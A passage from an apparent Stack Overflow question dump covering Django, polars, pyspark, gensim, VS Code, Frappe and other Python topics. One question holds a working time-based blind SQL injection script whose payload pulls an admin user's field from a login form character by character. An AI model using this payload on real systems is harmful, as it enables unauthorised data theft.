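sample = '"2198"\a"data"\a"x"\n"2199"\a"data2"\a"y"\n'
reader = csv.DictReader(
    io.StringIO(sample),
    delimiter='\a',                # one character: accepted by csv
    quoting=csv.QUOTE_ALL,
    skipinitialspace=True,
    fieldnames=['col1', 'col2', 'col3'],
)
rows = list(reader)
```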
|
<python><python-3.x><csv><delimiter><csvreader>
|
2023-05-21 19:59:11
| 1
| 613
|
Harish
|
76,301,661
| 13,630,719
|
How to render different UI contexts in a loop within a Django project?
|
<p>Suppose I have the following code:</p>
<pre><code>async def home(request):
if request.method == "POST":
number = "3"
context = {"number": number}
return render(request, 'home/home.html', context)
</code></pre>
<p>I want to have a website that returns different values of the context "3", "2", "1" at the beginning of a game. It would be in a loop similar to this:</p>
<pre><code>async def home(request):
if request.method == "POST":
number = 3
    while number >= 1:
context = {"number": str(number)}
render(request, 'home/home.html', context)
time.sleep(1)
number -= 1
</code></pre>
<p>The problem here is that I would need to return <code>render(request, 'home/home.html', context)</code>, but if I return that, I break out of the while loop. How can I iterate through the values I'd like and change the UI as required without breaking the loop?</p>
<p>Any advice would be appreciated</p>
|
<python><django><loops><render>
|
2023-05-21 19:50:37
| 0
| 1,342
|
ENV
|
76,301,530
| 10,266,059
|
What is os.Mapping and why isn't it in the os documentation?
|
<p>I am learning python and while using <code>dir()</code> to examine the <code>os</code> module I found an entry called <code>Mapping</code>. I tried to examine it:</p>
<pre><code>Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> type(os.Mapping)
<class 'abc.ABCMeta'>
>>> help(os.Mapping)
Help on class Mapping in module collections.abc:
class Mapping(Collection)
| A Mapping is a generic container for associating key/value
| pairs.
</code></pre>
<p>I searched for "os.Mapping" on the python docs site but no luck: <a href="https://docs.python.org/3/search.html?q=os.Mapping&check_keywords=yes&area=default" rel="nofollow noreferrer">https://docs.python.org/3/search.html?q=os.Mapping&check_keywords=yes&area=default</a></p>
<p>Why does the help say Mapping is in module collections.abc, while <code>dir(os)</code> lists it among the names in the <code>os</code> module?</p>
<pre><code>[... 'Mapping', ...]
</code></pre>
<p>I also looked on <a href="https://docs.python.org/3/library/collections.html" rel="nofollow noreferrer">https://docs.python.org/3/library/collections.html</a> but there is nothing called "Mapping" there.</p>
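<p><code>dir()</code> simply lists every top-level name bound in a module, including names the module imported for its own internal use; such names are not re-documented under that module. The same phenomenon can be seen with the stdlib <code>csv</code> module, which imports <code>re</code> for its own implementation (a sketch of the general point, not specific to <code>os.Mapping</code>):</p>

```python
import csv
import re

# csv.py itself does `import re` (used by csv.Sniffer), so the name `re`
# shows up in dir(csv) even though it is not part of csv's documented API.
found = 're' in dir(csv)
same_object = csv.re is re  # the name is bound to the very same module
```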
|
<python>
|
2023-05-21 19:15:44
| 1
| 1,676
|
Aleksey Tsalolikhin
|
76,301,422
| 9,542,989
|
Import Classes from Modules of Python Package to __init__
|
<p>In the Python package that I am working on there is a sub-package within it which contains a bunch of modules. Each module consists of a class.</p>
<p>Now, this package is meant to be extensible and there can be new modules introduced anytime. Similar to the existing modules, any new module introduced will also consist of their own class.</p>
<p>I want all of the classes in these modules to be imported into the <code>__init__.py</code> file of the sub-package.</p>
<p>Is there a way that I can do this automatically, so that I don't have to change the <code>__init__.py</code> file each time a new module is created?</p>
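<p>One common pattern (a sketch, not the only way; <code>collect_classes</code> is a hypothetical name) is to walk the sub-package with <code>pkgutil.iter_modules</code>, import each submodule, and pull out the classes it defines:</p>

```python
import importlib
import inspect
import pkgutil

def collect_classes(package):
    """Import every direct submodule of *package* and return a dict of the
    classes each one defines (re-exported classes are skipped)."""
    found = {}
    for _finder, name, _ispkg in pkgutil.iter_modules(package.__path__):
        module = importlib.import_module(f"{package.__name__}.{name}")
        for attr, obj in inspect.getmembers(module, inspect.isclass):
            if obj.__module__ == module.__name__:  # defined here, not imported
                found[attr] = obj
    return found
```

<p>In the sub-package's <code>__init__.py</code> you could then write <code>import sys; globals().update(collect_classes(sys.modules[__name__]))</code>, and newly added modules are picked up with no further edits.</p>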
|
<python><python-packaging>
|
2023-05-21 18:48:29
| 1
| 2,115
|
Minura Punchihewa
|
76,301,261
| 8,702,633
|
dotenv install error: "error: invalid command 'dist_info'"
|
<p>I'm getting an error installing dotenv on macOS:</p>
<pre><code>Collecting dotenv
Using cached dotenv-0.0.5.tar.gz (2.4 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Installing backend dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install backend dependencies did not run successfully.
│ exit code: 1
╰─> [29 lines of output]
Collecting distribute
Using cached distribute-0.7.3.zip (145 kB)
Installing build dependencies: started
Installing build dependencies: finished with status 'done'
Getting requirements to build wheel: started
Getting requirements to build wheel: finished with status 'done'
Preparing metadata (pyproject.toml): started
Preparing metadata (pyproject.toml): finished with status 'error'
error: subprocess-exited-with-error
× Preparing metadata (pyproject.toml) did not run successfully.
│ exit code: 1
╰─> [6 lines of output]
usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help
error: invalid command 'dist_info'
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed
× Encountered error while generating package metadata.
╰─> See above for output.
note: This is an issue with the package mentioned above, not pip.
hint: See above for details.
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error
× pip subprocess to install backend dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.
note: This error originates from a subprocess, and is likely not a problem with pip.
</code></pre>
<p>Someone said in another thread that it needs QT5. I tried to install QT5 but still facing the error.</p>
|
<python><pip><dotenv>
|
2023-05-21 18:04:53
| 3
| 331
|
Max
|
76,301,208
| 4,019,495
|
VS Code Python: unable to get auto import suggestions
|
<p>I'm using VS Code on Linux. <a href="https://code.visualstudio.com/docs/python/editing#_enable-auto-imports" rel="nofollow noreferrer">Auto imports</a> do not work for me.</p>
<p>Here is a screenshot:</p>
<p><a href="https://i.sstatic.net/ipQKe.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ipQKe.png" alt="Screenshot showing "No code actions available" on "math"" /></a></p>
<p>However, if I <code>import math</code>, VS Code is able to give suggestions when I type <code>math.</code>. This is my user settings.json:</p>
<pre class="lang-json prettyprint-override"><code>{
"python.linting.pylintEnabled": false,
"python.linting.flake8Enabled": false,
"python.analysis.indexing": true,
"python.analysis.autoImportCompletions": true,
"python.testing.pytestArgs": [
"-vv"
],
"python.testing.pytestEnabled": true,
"window.zoomLevel": -2
}
</code></pre>
<p>I don't have anything in my workspace settings.json. I've installed the ms-python and ms-pyright extensions. Everything should be a relatively recent version. Any ideas?</p>
|
<python><visual-studio-code>
|
2023-05-21 17:52:53
| 1
| 835
|
extremeaxe5
|
76,301,163
| 12,908,701
|
How to use choices of a Select field of a form, when defined in the view in Django?
|
<p>I have an issue with a form with a Select input. This input is used to select a user in a list. The list should only contain user from the group currently used.</p>
<p>I found a solution; however, I am not completely sure of what I am doing in the form definition (I do not fully understand how the <code>def __init__</code> part works). And of course, my code is not working: I obtain the right form with the choices I need, but if I submit data, it is not saved in the database.</p>
<p>I have been able to check if the form is valid (it is not), the error is the following :</p>
<blockquote>
<p>Category - Select a valid choice. That choice is not one of the available choices.</p>
</blockquote>
<p>(I have the same error for the user field.) I can't find my way through this, so any help would be very appreciated!</p>
<p>My models:</p>
<pre><code>class Group(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class User(AbstractUser):
groups = models.ManyToManyField(Group)
current_group = models.ForeignKey(Group, on_delete=models.SET_NULL,blank = True , null = True, related_name="current_group")
class Category(models.Model):
name = models.CharField(max_length=100)
groups = models.ManyToManyField(Group)
def __str__(self):
return self.name
class Expanses(models.Model):
date = models.DateTimeField()
amount = models.DecimalField(decimal_places=2, max_digits=12)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
group = models.ForeignKey(Group, on_delete=models.CASCADE)
comment = models.CharField(max_length=500)
def __str__(self):
return self.amount
</code></pre>
<p>My form:</p>
<pre><code>class CreateExpanseForm(forms.ModelForm):
class Meta:
model = Expanses
fields = ['date', 'amount', 'category', 'user','comment']
widgets={'date':DateInput(attrs={'placeholder':'Date', 'class':'form-input', 'type':'date'}),
'amount':TextInput(attrs={'placeholder':'Amount', 'class':'form-input', 'type':'text'}),
'category':Select(attrs={'placeholder':'Category', 'class':'form-select', 'type':'text'}),
'user':Select(attrs={'placeholder':'user', 'class':'form-select', 'type':'text'}),
'comment':TextInput(attrs={'placeholder':'comment', 'class':'form-input', 'type':'text'}),}
def __init__(self, *args, **kwargs):
user_choices = kwargs.pop('user_choices', None)
category_choices = kwargs.pop('category_choices', None)
super().__init__(*args, **kwargs)
if user_choices:
self.fields['user'].choices = user_choices
if category_choices:
self.fields['category'].choices = category_choices
</code></pre>
<p>My view:</p>
<pre><code>def SummaryView(request):
createExpanseForm = CreateExpanseForm(user_choices = [(user.username, user.username) for user in request.user.current_group.user_set.all()],
category_choices = [(category.name, category.name) for category in request.user.current_group.category_set.all()])
if request.method == "POST":
if 'createExpanse' in request.POST:
createExpanseForm = CreateExpanseForm(user_choices = [(user.username, user.username) for user in request.user.current_group.user_set.all()],
category_choices = [(category.name, category.name) for category in request.user.current_group.category_set.all()],
data=request.POST)
if createExpanseForm.is_valid():
expanse = createExpanseForm.save()
if expanse is not None:
expanse.group = request.user.current_group
expanse.save()
else:
messages.success(request, "Error!")
context = {'createExpanseForm':createExpanseForm}
return render(request, 'app/summary.html', context)
</code></pre>
|
<python><django><forms><selectinput>
|
2023-05-21 17:41:06
| 1
| 563
|
Francois51
|
76,301,107
| 20,443,528
|
How to sort a model's objects if the model has foreign key relations and I have to sort based on the properties of the foreign model?
|
<p>How to sort a model's objects if the model has foreign key relations and I have to sort based on the properties of the foreign model?</p>
<p>Here is my model</p>
<pre><code>class Room(models.Model):
class Meta:
ordering = ['number']
number = models.PositiveSmallIntegerField(
validators=[MaxValueValidator(550), MinValueValidator(1)],
primary_key=True
)
CATEGORIES = (
('Regular', 'Regular'),
('Executive', 'Executive'),
('Deluxe', 'Deluxe'),
)
category = models.CharField(max_length=9, choices=CATEGORIES, default='Regular')
CAPACITY = (
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4'),
)
capacity = models.PositiveSmallIntegerField(
choices=CAPACITY, default=2
)
advance = models.PositiveSmallIntegerField(default=10)
manager = models.ForeignKey(
settings.AUTH_USER_MODEL, on_delete=models.CASCADE
)
class TimeSlot(models.Model):
class Meta:
ordering = ['available_from']
room = models.ForeignKey(Room, on_delete=models.CASCADE)
available_from = models.TimeField()
available_till = models.TimeField()
class Booking(models.Model):
customer = models.ForeignKey(User, on_delete=models.CASCADE)
check_in_date = models.DateField()
timeslot = models.ForeignKey(TimeSlot, on_delete=models.CASCADE)
</code></pre>
<p>Suppose I have to sort the objects of the <code>Booking</code> model on the basis of <code>available_from</code> or <code>number</code> how will I do it?</p>
|
<python><django><django-models><django-queryset>
|
2023-05-21 17:25:47
| 1
| 331
|
Anshul Gupta
|
76,301,087
| 4,451,315
|
polars: list to columns, without `get`
|
<p>Say I have:</p>
<pre class="lang-py prettyprint-override"><code>In [1]: df = pl.DataFrame({'a': [[1,2], [3,4]]})
In [2]: df
Out[2]:
shape: (2, 1)
┌───────────┐
│ a │
│ --- │
│ list[i64] │
╞═══════════╡
│ [1, 2] │
│ [3, 4] │
└───────────┘
</code></pre>
<p>I know that all elements of <code>'a'</code> are lists of the same length.</p>
<p>I can do:</p>
<pre class="lang-py prettyprint-override"><code>In [10]: df.select(pl.col('a').list.get(i).alias(f'a_{i}') for i in range(2))
Out[10]:
shape: (2, 2)
┌─────┬─────┐
│ a_0 ┆ a_1 │
│ --- ┆ --- │
│ i64 ┆ i64 │
╞═════╪═════╡
│ 1 ┆ 2 │
│ 3 ┆ 4 │
└─────┴─────┘
</code></pre>
<p>but this involves hard-coding <code>2</code>.</p>
<p>Is there a way to do this without hard-coding the <code>2</code>? I may not know in advance how many elements there are in the lists; I just know that they all have the same number of elements.</p>
|
<python><dataframe><python-polars>
|
2023-05-21 17:21:17
| 1
| 11,062
|
ignoring_gravity
|
76,300,991
| 6,640,504
|
How to assign a constant value to all records of the pyspark dataframe window
|
<p>I have a pyspark dataframe like this:</p>
<pre><code>+-------+-------+
| level | value |
+-------+-------+
| 1 | 4 |
| 1 | 5 |
| 2 | 2 |
| 2 | 6 |
| 2 | 3 |
+-------+-------+
</code></pre>
<p>I have to create a value for every group in the <strong>level</strong> column and save it in the <strong>lable</strong> column. This value must be unique per group, so I use Mongo's <strong>ObjectId</strong> function to create it. The next dataframe looks like this:</p>
<pre><code>+-------+--------+-------+
| level | lable| value |
+-------+--------+-------+
| 1 | bb76 | 4 |
| 1 | bb76 | 5 |
| 2 | cv86 | 2 |
| 2 | cv86 | 6 |
| 2 | cv86 | 3 |
+-------+--------+-------+
</code></pre>
<p>Then I must create a dataframe as following:</p>
<pre><code>+-------+-------+
| lable | value |
+-------+-------+
| bb76 | 9 |
| cv86 | 11 |
+-------+-------+
</code></pre>
<p>To do that, first I used <code>spark groupby</code>:</p>
<pre><code> def create_objectid():
a = str(ObjectId())
return a
def add_lable(df):
df = df.cache()
df.count()
grouped_df = df.groupby('level').agg(sum(df.value).alias('temp'))
grouped_df = grouped_df.withColumnRenamed('level', 'level_temp')
grouped_df = grouped_df.withColumn('lable', udf_create_objectid())
grouped_df = grouped_df.drop('temp')
df = df.join(grouped_df.select('level_temp','lable'), col('level') == col('level_temp'), how="left").drop(grouped_df.level_temp)
return df
</code></pre>
<p>When I used the above code on a <em>Spark dataframe</em> with 2 million records, it took about <code>155</code> seconds to finish.
I searched and found that a <code>spark window</code> has better performance, so I changed the last function to the one below. Because a <code>pandas_udf</code> needs an argument, I just pass one and print it:</p>
<pre><code>@f.pandas_udf("string")
def create_objectid_on_window(v: pd.Series) -> str:
print('v:',v)
return str(ObjectId())
def add_lable(df):
w = Window.partitionBy('level')
df = df.withColumn('lable', create_objectid_on_window('level').over(w))
return df
</code></pre>
<p>But after running the program, I receive this error:</p>
<pre><code>AttributeError: 'NoneType' object has no attribute '_jvm'
</code></pre>
<h2>Update</h2>
<p>I read this question and answers; I do know this is because of the pandas UDF function. How can I change it?</p>
|
<python><apache-spark><pyspark>
|
2023-05-21 16:53:39
| 0
| 1,172
|
M_Gh
|
76,300,983
| 8,235,224
|
How to interpret word2vec train output?
|
<p>Running the code snippet below reports an output of (3, 60). I wonder what exactly it is reporting?</p>
<p>The code is reproducible: just copy it into a notebook cell and run.</p>
<pre><code>from gensim.models import Word2Vec
sent = [['I', 'love', 'cats'], ['Dogs', 'are', 'friendly']]
w2v_model = Word2Vec(sentences=sent, vector_size=100, window=7, min_count=1,sg=1)
w2v_model.train(sent, total_examples=len(sent), epochs=10)
</code></pre>
<p>(3, 60)</p>
|
<python><nlp><word2vec>
|
2023-05-21 16:52:10
| 1
| 2,943
|
Regi Mathew
|
76,300,901
| 6,258,636
|
Create a Python list with every combination of '+', '-', '*', and '/' strings
|
<p>I am trying to build a 2d list of test cases that contains all the possible cases ('+', '-', '*', '/') like this:</p>
<pre><code>[('+', '+', '+', '+'),
('+', '+', '+', '-'),
('+', '+', '+', '/'),
('+', '+', '+', '*'),
('+', '+', '-', '-'),
('+', '+', '-', '/'),
('+', '+', '-', '*'),
('+', '+', '/', '/'),
('+', '+', '/', '*'),
('+', '+', '*', '*'),
('+', '-', '-', '-'),
('+', '-', '-', '/'),
('+', '-', '-', '*'),
('+', '-', '/', '/'),
('+', '-', '/', '*'),
('+', '-', '*', '*'),
('+', '/', '/', '/'),
('+', '/', '/', '*'),
('+', '/', '*', '*'),
('+', '*', '*', '*'),
('-', '-', '-', '-'),
('-', '-', '-', '/'),
('-', '-', '-', '*'),
('-', '-', '/', '/'),
('-', '-', '/', '*'),
('-', '-', '*', '*'),
('-', '/', '/', '/'),
('-', '/', '/', '*'),
('-', '/', '*', '*'),
('-', '*', '*', '*'),
('/', '/', '/', '/'),
('/', '/', '/', '*'),
('/', '/', '*', '*'),
('/', '*', '*', '*'),
('*', '*', '*', '*')]
</code></pre>
<p>I am thinking of creating it with a Python list comprehension. I tried:</p>
<pre><code>[[x] * 4 for x in ('+','-','*', '/')]
</code></pre>
<p>but the result is not what I want. Does anyone know how to do it? Thanks.</p>
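<p>Since the order inside each tuple doesn't matter here (each tuple is a multiset of operators in a fixed order), this is exactly what <code>itertools.combinations_with_replacement</code> produces:</p>

```python
from itertools import combinations_with_replacement

# Same operator order as the desired listing: +, -, /, *
ops = ('+', '-', '/', '*')
cases = list(combinations_with_replacement(ops, 4))
# 4 symbols taken 4 at a time with repetition: C(4 + 4 - 1, 4) = 35 tuples
```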
|
<python>
|
2023-05-21 16:33:47
| 1
| 1,434
|
Ken
|
76,300,464
| 2,876,994
|
How to be more precise calculation elapsed time using python request?
|
<p>I'm trying to simulate SQLMap exploiting a time-based SQL injection.</p>
<pre><code>import string
import time

import requests

# url, headers and cookies are defined elsewhere in the script

resultado = ""
listaCaracteres = string.ascii_letters + string.digits + "._-@/"
delay = 5
tamanhoCampo = 30

for i in range(1, tamanhoCampo + 1):
    caracterEncontrado = False
    for caracter in listaCaracteres:
        data = {
            "username": f"teste' OR IF((SELECT substring(avatar,{i},1) FROM users WHERE username='admin')='{caracter}',SLEEP({delay}),1)#",
            "password": "teste"
        }
        startTime = time.time()
        try:
            # print(f"[+] Iniciando Requisição - posição {i} caracter {caracter}")
            resp = requests.post(url, headers=headers, cookies=cookies, data=data)
        except Exception as e:
            print(e)
        endTime = time.time()
        tempoTotal = endTime - startTime
        print(f"[*] Pos. {i} {caracter} {tempoTotal}")
        if tempoTotal >= delay:
            print(f"[+] Caracter encontrado {caracter} {tempoTotal}")
            resultado += caracter
            caracterEncontrado = True
            delay = 5
            break
    if not caracterEncontrado:
        delay += 1
        print(f"[*] Caracter não encontrado, aumentando o tempo de resposta para {delay} segundos")
print(resultado)
</code></pre>
<p>Debugging the results</p>
<pre><code>[*] Iniciando o DUMP.
[*] Pos. 1 a 0.41757917404174805
[*] Pos. 1 b 0.42841196060180664
[*] Pos. 1 c 0.42807817459106445
[*] Pos. 1 d 1.420304536819458
[*] Pos. 1 e 0.4183344841003418
[*] Pos. 1 f 0.4205491542816162
[*] Pos. 1 g 0.41797685623168945
[*] Pos. 1 h 0.41671323776245117
[*] Pos. 1 i 0.41751718521118164
[*] Pos. 1 j 0.4145169258117676
[*] Pos. 1 k 0.4157712459564209
[*] Pos. 1 l 0.4163017272949219
[*] Pos. 1 m 0.41348886489868164
[*] Pos. 1 n 0.4273350238800049
[*] Pos. 1 o 0.42464113235473633
[*] Pos. 1 p 0.4265732765197754
[*] Pos. 1 q 0.4321424961090088
[*] Pos. 1 r 0.4281890392303467
[*] Pos. 1 s 0.41872739791870117
[*] Pos. 1 t 0.41807007789611816
[*] Pos. 1 u 4.920653581619263
[*] Pos. 1 v 0.41268229484558105
[*] Pos. 1 w 0.47426342964172363
[*] Pos. 1 x 0.4102909564971924
[*] Pos. 1 y 0.41750526428222656
[*] Pos. 1 z 0.41268014907836914
[*] Pos. 1 A 0.412386417388916
[*] Pos. 1 B 0.4086577892303467
[*] Pos. 1 C 0.41196632385253906
</code></pre>
<p>Pos. 1, letter u, takes almost 5 seconds (4.9), and that is exactly the first character of the avatar field I'm looking for. But each run of the script gives 4.9 or a bit more than 5 seconds, so sometimes the <code>tempoTotal >= delay</code> condition triggers and sometimes it doesn't!</p>
<p>So, how can I calculate the elapsed time more accurately?</p>
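<p>One thing that usually helps (a sketch with a hypothetical <code>timed_post</code> helper, not the asker's exact script): use <code>Response.elapsed</code>, which <code>requests</code> measures itself between sending the request and receiving the response headers, so it excludes local Python overhead around the call, and take the median of a few samples to damp network jitter:</p>

```python
import statistics

import requests  # assumed available, as in the original script

def timed_post(url, data, samples=3, **kwargs):
    """Hypothetical helper: POST `samples` times and return the median of
    requests' own per-response timer, Response.elapsed (a timedelta
    measured from sending the request until the headers arrive)."""
    times = []
    for _ in range(samples):
        resp = requests.post(url, data=data, **kwargs)
        times.append(resp.elapsed.total_seconds())
    return statistics.median(times)
```

<p>With <code>tempoTotal = timed_post(url, data, headers=headers, cookies=cookies)</code>, a single slow round trip (like the 1.42 s outlier on letter d) is much less likely to cross the threshold; widening the gap, e.g. keeping SLEEP(5) but comparing against <code>delay - 0.5</code>, also helps.</p>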
|
<python><request><sql-injection><elapsedtime>
|
2023-05-21 14:46:08
| 0
| 1,552
|
Shinomoto Asakura
|
76,300,455
| 5,617,608
|
Welcome emails sent by Frappe framework are missing the port number
|
<p>When using Frappe framework and changing the Nginx port from 80 to 8002 to avoid conflicts, I get broken URLs in all emails sent by the system. The port was changed using <code>bench set-nginx-port 8002</code>. The ports 80 and 8000 are already busy in the VPS.</p>
<p>While I access the system at hostname:port_number, the URLs in all emails sent by the system come through as hostname/the-rest-of-url, without the port.</p>
<p>The same issue was reported on <a href="https://discuss.frappe.io/t/email-not-sending-correct-url-on-updating-nginx-port/47290/2" rel="nofollow noreferrer">frappe.io</a> and <a href="https://github.com/frappe/erpnext/issues/17044" rel="nofollow noreferrer">GitHub</a>, but it's unclear how to solve it.</p>
<p>How can I solve this? Thank you in advance!</p>
|
<python><nginx><erpnext><frappe>
|
2023-05-21 14:44:23
| 1
| 1,759
|
Esraa Abdelmaksoud
|
76,300,404
| 7,987,455
|
Why is "requests-html" not rendering all HTML content?
|
<p>I am trying to scrape data, but the script is not loading all of the HTML content, although I increased the rendering time. Please see the code below:</p>
<pre><code>from requests_html import HTMLSession, AsyncHTMLSession
url = 'https://www.aliexpress.com/w/wholesale-test.html?catId=0&initiative_id=SB_20230516115154&SearchText=test&spm=a2g0o.home.1000002.0'
def create_session(url):
session = HTMLSession()
request = session.get(url)
print("Before ",len(request.html.html),"\n\n")
request.html.render(sleep=5,timeout=20) #Because it is dynamic website, will wait until to load the page
prod = request.html.find('#root > div > div > div.right--container--1WU9aL4.right--hasPadding--52H__oG > div > div.content--container--2dDeH1y > div.list--gallery--34TropR > a:nth-child(1) > div.manhattan--content--1KpBbUi')
print("After ",len(request.html.html),"\n\n")
print("output:",prod)
session.close()
create_session(url)
</code></pre>
<p>When I ran the code for the <strong>first time</strong>, the output was:</p>
<pre><code>Before 55448
After 542927
output: [<Element 'div' class=('manhattan--content--1KpBbUi',)>]
</code></pre>
<p>when I run the program again (<strong>WITHOUT changing anything in the code</strong>) I got:</p>
<pre><code>Before 55448
After 251734
output: []
</code></pre>
<p>and when I changed the sleep time from 5 to 100: <code>request.html.render(sleep=5,timeout=20)</code> to <code>request.html.render(sleep=100,timeout=20)</code>, I also received a similar output:</p>
<pre><code>Before 55448
After 242881
output: []
</code></pre>
<p>It is not rendering all of the HTML content.</p>
|
<python><web-scraping><beautifulsoup><python-requests><html-rendering>
|
2023-05-21 14:31:50
| 0
| 315
|
Ahmad Abdelbaset
|
76,300,362
| 20,220,485
|
How do you reconcile a list of tuples containing a tokenized string with the original string?
|
<p>I am trying to reconcile <code>idx_tag_token</code>, which is a list of tuples containing a tokenized string and its label and character index, with the original string <code>word_string</code>. I want to output a list of tuples, with each tuple containing an element of the original string if split on whitespace, along with label information from <code>idx_tag_token</code>.</p>
<p>I have written some code that finds a token's associated word in <code>word_string</code> based on the character index. I then create a list of tuples with each of these words and the associated label, defined as <code>word_tag_list</code>. However, based on this, I am unsure how to proceed to create the desired output.</p>
<p>The conditions to update the labels are not complicated, but I can't work out the appropriate system here.</p>
<p>Any assistance would be truly appreciated.</p>
<p>The data:</p>
<pre><code>word_string = "At London, the 12th in February, 1942, and for that that reason Mark's (3) wins, American parts"
idx_tag_token =[(0, 'O', 'At'),
(3, 'GPE-B', 'London'),
(9, 'O', ','),
(11, 'DATE-B', 'the'),
(15, 'DATE-I', '12th'),
(20, 'O', 'in'),
(23, 'DATE-B', 'February'),
(31, 'DATE-I', ','),
(33, 'DATE-I', '1942'),
(37, 'O', ','),
(39, 'O', 'and'),
(43, 'O', 'for'),
(47, 'O', 'that'),
(52, 'O', 'that'),
(57, 'O', 'reason'),
(64, 'PERSON-B', 'Mark'),
(68, 'O', "'s"),
(71, 'O', '('),
(72, 'O', '3'),
(73, 'O', ')'),
(75, 'O', 'wins'),
(79, 'O', ','),
(81, 'NORP-B', 'American'),
(90, 'O', 'parts')]
</code></pre>
<p>My code:</p>
<pre><code>def find_word_from_index(idx, word_string):
words = word_string.split()
current_index = 0
for word in words:
start_index = current_index
end_index = current_index + len(word) - 1
if start_index <= idx <= end_index:
return word
current_index = end_index + 2
return None
word_tag_list = []
for index, tag, _ in idx_tag_token:
word = find_word_from_index(index, word_string)
word_tag_list.append((word, tag))
word_tag_list
</code></pre>
<p>Current output:</p>
<pre><code>[('At', 'O'),
('London,', 'GPE-B'),
('London,', 'O'),
('the', 'DATE-B'),
('12th', 'DATE-I'),
('in', 'O'),
('February,', 'DATE-B'),
('February,', 'DATE-I'),
('1942,', 'DATE-I'),
('1942,', 'O'),
('and', 'O'),
('for', 'O'),
('that', 'O'),
('that', 'O'),
('reason', 'O'),
("Mark's", 'PERSON-B'),
("Mark's", 'O'),
('(3)', 'O'),
('(3)', 'O'),
('(3)', 'O'),
('wins,', 'O'),
('wins,', 'O'),
('American', 'NORP-B'),
('parts', 'O')]
</code></pre>
<p>Desired output:</p>
<pre><code>[('At', 'O'),
('London,', 'GPE-B'),
('the', 'DATE-B'),
('12th', 'DATE-I'),
('in', 'O'),
('February,', 'DATE-B'),
('1942,', 'DATE-I'),
('and', 'O'),
('for', 'O'),
('that', 'O'),
('that', 'O'),
('reason', 'O'),
("Mark's", 'PERSON-B'),
('(3)', 'O'),
('wins,', 'O'),
('American', 'NORP-B'),
('parts', 'O')]
</code></pre>
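<p>One way to get from the data to the desired output (a sketch; <code>align_tags</code> is a hypothetical name) is to compute each whitespace-separated word's character span first, then give the word the tag of the first token whose index falls inside that span, so each word appears exactly once:</p>

```python
def align_tags(word_string, idx_tag_token):
    """Give each whitespace-separated word the tag of the first token whose
    character offset falls inside the word's span ('O' if none does)."""
    spans, pos = [], 0
    for word in word_string.split():
        start = word_string.index(word, pos)   # [start, end) span of this word
        spans.append((start, start + len(word), word))
        pos = start + len(word)
    return [
        (word, next((tag for idx, tag, _ in idx_tag_token
                     if start <= idx < end), 'O'))
        for start, end, word in spans
    ]
```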
|
<python><string><indexing><tuples><tokenize>
|
2023-05-21 14:20:24
| 1
| 344
|
doine
|
76,300,306
| 5,838,180
|
How to cross match with python 2 dataframes by (Cartesian) coordinates?
|
<p>I have two astronomical catalogues containing galaxies with their respective sky coordinates (ra, dec). I handle the catalogues as data frames. The catalogues are from different observational surveys, and some galaxies appear in both. I want to cross-match these galaxies and put them in a new catalogue. How can I do this with Python? I thought there should be some easy way with numpy, pandas, astropy or another package, but I couldn't find a solution. Thanks!</p>
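<p>Astropy's <code>SkyCoord.match_to_catalog_sky</code> is the usual tool for this. If you would rather stay in numpy/pandas, here is a sketch with hypothetical column names <code>ra</code>/<code>dec</code> (in degrees): convert the coordinates to 3-D unit vectors so that a KD-tree's Euclidean distance becomes chord length on the sphere, then cut at the chord corresponding to the matching radius:</p>

```python
import numpy as np
import pandas as pd
from scipy.spatial import cKDTree  # scipy assumed available

def crossmatch(df1, df2, radius_deg):
    """Match each row of df1 to its nearest neighbour in df2 on the sky.

    Hypothetical column names 'ra'/'dec', both in degrees. Returns a frame
    of matched positional indices (idx1 into df1, idx2 into df2)."""
    def unit_vectors(df):
        ra = np.radians(df['ra'].to_numpy())
        dec = np.radians(df['dec'].to_numpy())
        return np.column_stack([np.cos(dec) * np.cos(ra),
                                np.cos(dec) * np.sin(ra),
                                np.sin(dec)])

    dist, idx = cKDTree(unit_vectors(df2)).query(unit_vectors(df1))
    # Chord length corresponding to an angular separation of radius_deg.
    max_chord = 2.0 * np.sin(np.radians(radius_deg) / 2.0)
    mask = dist <= max_chord
    return pd.DataFrame({'idx1': np.flatnonzero(mask), 'idx2': idx[mask]})
```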
|
<python><pandas><database><astropy><cross-match>
|
2023-05-21 14:09:07
| 1
| 2,072
|
NeStack
|
76,300,212
| 14,366,549
|
Problems combining tensorflow with huggingGPT transformers on a python project
|
<p>This is my code:</p>
<pre><code>mport os
from dotenv import load_dotenv
from database import create_connection
import mysql.connector
# from user_interface import user_interface
from flask import Flask, request, jsonify
import pandas as pd
import mysql.connector
from transformers import BertTokenizer, TFBertForSequenceClassification
import tensorflow as tf
# Load environment variables from .env file
load_dotenv()
print(tf.__version__)
app = Flask(__name__)
# Get environment variables
host = os.getenv('DB_HOST')
user = os.getenv('DB_USER')
password = os.getenv('DB_PASSWORD')
db_name = os.getenv('DB_NAME')
connection = create_connection(host, user, password, db_name)
# Load the model and tokenizer
# model = TFBertForSequenceClassification.from_pretrained('bert-base-uncased')
model = TFBertForSequenceClassification.from_pretrained('bert-base-uncased')
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
# Define categories
</code></pre>
<p>but when I try to run I always get this error:</p>
<pre><code>Traceback (most recent call last):
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1076, in _get_module
return importlib.import_module("." + module_name, self.__name__)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/Cellar/python@3.11/3.11.3/Frameworks/Python.framework/Versions/3.11/lib/python3.11/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
